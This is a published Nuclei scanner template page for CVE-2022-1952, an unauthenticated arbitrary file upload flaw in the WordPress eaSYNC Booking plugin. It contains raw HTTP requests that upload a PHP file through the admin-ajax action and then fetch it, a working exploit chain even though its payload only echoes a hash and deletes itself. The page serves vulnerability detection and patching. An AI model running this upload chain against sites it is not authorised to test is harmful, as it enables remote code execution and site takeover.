Skip to content
Nuclei Templates

WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload

ID: CVE-2022-1952

Severity: critical

Author: theamanrawat

Tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive,syntactics

Description

Section titled “Description”

WordPress eaSync Booking plugin bundle for hotel, restaurant and car rental before 1.1.16 is susceptible to arbitrary file upload. The plugin contains insufficient input validation of an AJAX action. An allowlist of valid file extensions is defined but is not used during the validation steps. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

YAML Source

Section titled “YAML Source”
id: CVE-2022-1952


info:
  name: WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    WordPress eaSync Booking plugin bundle for hotel, restaurant and car rental before 1.1.16 is susceptible to arbitrary file upload. The plugin contains insufficient input validation of an AJAX action. An allowlist of valid file extensions is defined but is not used during the validation steps. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could result in remote code execution, allowing an attacker to take complete control of the affected WordPress site.
  remediation: |
    Update to the latest version of the WordPress eaSYNC Booking plugin (1.1.16) or apply the vendor-provided patch to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/ecf61d17-8b07-4cb6-93a8-64c2c4fbbe04
    - https://wordpress.org/plugins/easync-booking/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1952
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1952
    cwe-id: CWE-434
    epss-score: 0.79729
    epss-percentile: 0.98289
    cpe: cpe:2.3:a:syntactics:free_booking_plugin_for_hotels\,_restaurant_and_car_rental:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: syntactics
    product: free_booking_plugin_for_hotels\,_restaurant_and_car_rental
    framework: wordpress
  tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive,syntactics
variables:
  string: "CVE-2022-1952"


http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37
        Content-Type: multipart/form-data; boundary=------------------------98efee55508c5059


        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="action"


        easync_session_store
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="type"


        car
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="with_driver"


        self-driven
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="driver_license_image2"; filename="{{randstr}}.php"
        Content-Type: application/octet-stream


        <?php echo md5("{{string}}");unlink(__FILE__);?>


        --------------------------98efee55508c5059--
      - |
        GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37
      - |
        GET /wp-content/uploads/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: word
        part: body_3
        words:
          - '{{md5(string)}}'


    extractors:
      - type: regex
        name: filename
        group: 1
        regex:
          - 'wp-content\\\/uploads\\\/([0-9a-zA-Z]+).php'
        internal: true
# digest: 4a0a00473045022100b064b2f1b570ae7d1f5c4f2094b8539b60b1c447962495c8a36ad4099da0f0c902205553b9aad8f0b271b78d8a8d72c33b8d76866a9a454a325c4e73b9de50216888:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-1952.yaml"

View on Github